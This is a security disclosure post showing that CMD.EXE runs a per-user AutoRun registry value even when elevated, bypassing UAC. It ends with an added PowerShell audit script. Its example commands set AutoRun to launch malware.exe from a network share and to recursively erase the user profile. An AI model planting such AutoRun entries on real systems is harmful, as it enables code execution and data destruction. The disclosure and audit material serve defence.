Hi @ll,

the help text displayed by the command line "%COMSPEC% /?" as well as
the documentation of Windows' command processor CMD.EXE both state:

| * Executing registry subkeys
|
| If you do not specify /d in String, Cmd.exe looks for the following
| registry subkeys:
|
| HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun\REG_SZ
|
| HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun\REG_EXPAND_SZ
|
| If one or both registry subkeys are present, they are executed before
| all other variables.
|
|  ^
| /!\ Warning
| ¯¯¯
| Incorrectly editing the registry may severely damage your system.

Especially this last remark is NOT correct, or at least incomplete:
correctly editing the registry may severely damage your system too!

Demonstration:
~~~~~~~~~~~~~~

0. Log on to the "protected" administrator account created during
   the installation of Windows.

1. Run the following command line to add the AutoRun registry entry:

   REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ /D "ECHO HKEY_CURRENT_USER" /F

2. Start the command processor C:\Windows\System32\cmd.exe per
   double-click or via command line %COMSPEC%: it prints the line

   | HKEY_CURRENT_USER

3. Start Windows^WFile Explorer, open the "System" directory,
   right-click on C:\Windows\System32\cmd.exe to display its context
   menu, then click on the "Run as administrator" entry and
   acknowledge the UAC prompt: again it prints the line

   | HKEY_CURRENT_USER

OUCH: although running elevated now, the command processor evaluates a
registry entry written by an unprivileged user, thereby bypassing the
"wonderful" but completely futile security theatre known as user
account control!

JFTR: of course nobody uses the "protected" administrator account
created during Windows setup for their everyday work, and also nobody
will EVER start an elevated command prompt there?!

Now just consider running one of the following command lines and
imagine what damage their execution may spark:

   REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ "\\server\share\malware.exe" /F

   REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ "ERASE /F /Q /S ""%USERPROFILE%""" /F

stay tuned, and far away from "protected" accounts and split tokens!
Stefan Kanthak

PS: compare this misbehaviour of the command processor to that of COM,
    as documented in :

| Beginning with Windows Vista® and Windows Server® 2008, if the integrity
| level of a process is higher than Medium, the COM runtime ignores per-
| user COM configuration and accesses only per-machine COM configuration.
| This action reduces the surface area for elevation of privilege attacks,
| preventing a process with standard user privileges from configuring a
| COM object with arbitrary code and having this code called from an
| elevated process.
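
An audit for the two AutoRun values described above, as an added example that is not part of the original post: it reports the per-machine value and the per-user value of every loaded user hive, so a per-user entry is noticed before an elevated command prompt evaluates it. Enumerating HKEY_USERS instead of only HKEY_CURRENT_USER goes beyond the post, and the variable names and the Scope labels are choices of this example.

```powershell
# Added example: list every Command Processor AutoRun value on this host.
# Run from an elevated PowerShell so that all loaded user hives are readable.
$subKey = 'Software\Microsoft\Command Processor'

# Per-machine key, plus the per-user key of every loaded user hive
# (HKEY_CURRENT_USER is a view of one HKEY_USERS\<SID> hive).
$roots = @('Registry::HKEY_LOCAL_MACHINE')
$roots += Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -notlike '*_Classes' } |
    ForEach-Object { "Registry::$($_.Name)" }

$findings = foreach ($root in $roots) {
    $path = "$root\$subKey"
    if (-not (Test-Path -LiteralPath $path)) { continue }

    $key = Get-Item -LiteralPath $path
    if ($key.GetValueNames() -notcontains 'AutoRun') { continue }

    # Read REG_EXPAND_SZ data unexpanded, exactly as it is stored.
    $noExpand = [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames

    [pscustomobject]@{
        Key     = $key.Name
        Scope   = if ($root -like '*HKEY_LOCAL_MACHINE') { 'per-machine' } else { 'per-user' }
        Type    = $key.GetValueKind('AutoRun')
        AutoRun = $key.GetValue('AutoRun', $null, $noExpand)
    }
}

if ($findings) {
    # Any per-user entry is data that the user can set without elevation.
    $findings | Sort-Object Scope, Key | Format-List
} else {
    Write-Output 'No Command Processor AutoRun values found.'
}
```

Per the help text quoted at the top of the post, starting Cmd.exe with /d makes it skip these values.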